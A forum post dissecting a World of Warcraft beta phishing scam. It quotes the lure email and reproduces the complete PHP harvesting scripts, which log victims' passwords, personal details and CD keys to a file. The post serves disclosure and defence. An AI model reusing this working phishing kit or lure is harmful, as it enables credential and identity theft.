Might be interesting to look at...

[zushiba]

Okay so I know this totally isn't the place to put something like this but I figure some of you may be gamers yourself and might be interested in ripping this apart.

 

If you play World of Warcraft then you have to be familiar with scammers attempting to gain access to your password & other valuable information. I got a Wrath of the LichKing Beta scam mail today which somewhat irked me.

 

The email reads

You have been chosen to become a participant for our upcoming World of Warcraft expansion: Wrath of the Lich King!

The beta will commence in a month from now, and we are accepting applicants for the closed beta until February 31th.

 

However, if you are the original owner of your World of Warcraft account, you are granted a spot in the beta.

All you need to do is to confirm your account, but hurry!

Time is limited, and we have a selected amount of spots to fill for the beta testing period.

 

To accept the beta and confirm that you are the original owner of your account, you need to visit www.worldofwarcraft.com/wotlkbeta/id=327924 and fill in your account information. It will take about 2-3 work days before you will receive any response.

 

Please do not share this website in any way. If you do, your account can and will be suspended.

 

Sincerely,

 

Blizzard Entertainment Inc

Account Administration Team

P.O Box 18979, Irvine, CA 92623

 

The link actually leads too hxxp://h1.ripway.com/vvrathofthelichking    *delinked just in case anyone is wary of that sort of thing*

 

I use to work for a webhost and one of my responsibilities was to monitor for this kind of thing and I'm actually aware of this script and have a copy. I'll paste the source.

 

<?php
    header("Location: signup.html");   // Ïåðåíàïðàâëåíèå
/*
rename logs.html to something like 94ja2.html
and change 
$file = ("logs.html");
to 
$file = ("94ja2.html");
this may help you to keep all the info to your self

+++++++++++++++++++++++++++++++++++++++++++++++
MMOWNED.COM
Coding/Image Editing - Tcl70
English Language/Grammar Consultation - m0rbidang3l
+++++++++++++++++++++++++++++++++++++++++++++++
*/


    $file = "94ja2.html";   // File name

    $date = date("d.m.Y H:i");   // Äàòà çàïèñè

    // Èíèöèàëèçàöèÿ ïåðåìåííîé ñ þçåðîì
    $user = "";
    if (isset($_POST["login"])) $user = strval($_POST["login"]);

    // Èíèöèàëèçàöèÿ ïåðåìåííî ñ ïàññîì
    $pass = "";
    if (isset($_POST["password"])) $pass = strval($_POST["password"]);

    // Àéïèøíèê þçåðà
    $ip = strval($_SERVER["REMOTE_ADDR"]);

    // Ôîðìàòèðóåì äàííûå äëÿ çàïèñè
    $entry  = "<br>----------<br><br>\n";
    $entry .= sprintf("Date: %s<br>\n", $date);
    $entry .= sprintf("Username: %s<br>\n", $user);
    $entry .= sprintf("Password: %s<br>\n", $pass);
    $entry .= sprintf("IP: %s<br>\n", $ip);

    $fp = fopen($file, "a+");   // Îòêðûòèå ôàéëà

    if (!$fp) die("Can't perform operation!");   // Îøèáî÷êà
    if (!fwrite($fp, $entry)) die("Can't perform operation!");   // Çàïèñü

    fclose($fp);   // Çàêðûòèå
   
?>

 

<?php
header( 'Location: finish.html' );
/*
rename logs.html to something like 94ja2.html
and change 
$file = ("logs.html");
to 
$file = ("94ja2.html");
this may help you to keep all the info to your self

+++++++++++++++++++++++++++++++++++++++++++++++
MMOWNED.COM
Coding/Image Editing - Tcl70
English Language/Grammar Consultation - m0rbidang3l
+++++++++++++++++++++++++++++++++++++++++++++++
*/
//////////////////////////
$file = ("94ja2.html");
//////////////////////////
$name = $_POST['firstName'];
$lname = $_POST['lastName'];
$address1 = $_POST['addressLine1'];
$address2 = $_POST['addressLine2'];
$city = $_POST['city'];
$state = $_POST['state'];
$zip = $_POST['postalCode'];
$email = $_POST['email'];
$phone = $_POST['phoneNumber1'];
$answer = $_POST['answer'];
$cdkey = $_POST['keycode'];
$ip = $_SERVER['REMOTE_ADDR'];

$entry_line = "firstName: ".$name.
"<br> lastName: ".$lname.
"<br> addressLine1: ".$address1.
"<br> addressLine2: ".$address2.
"<br> city: ".$city.
"<br> state: ".$state.
"<br> postalCode: ".$zip.
"<br> email: ".$email.
"<br> phoneNumber1: ".$phone.
"<br> secretquestion: ".$answer.
"<br> cdkey: ".$cdkey."
<br><hr>";
    $fp = fopen($file, "a");
    fwrite($fp, $entry_line);
    fclose($fp);
?>

 

Yes it does output to the default html file, the guy was too stupid to change that. I don't endorse this kind of stuff but I do endorse shutting down this kind of stuff. I have already sent an email too the host (Don't expect a response)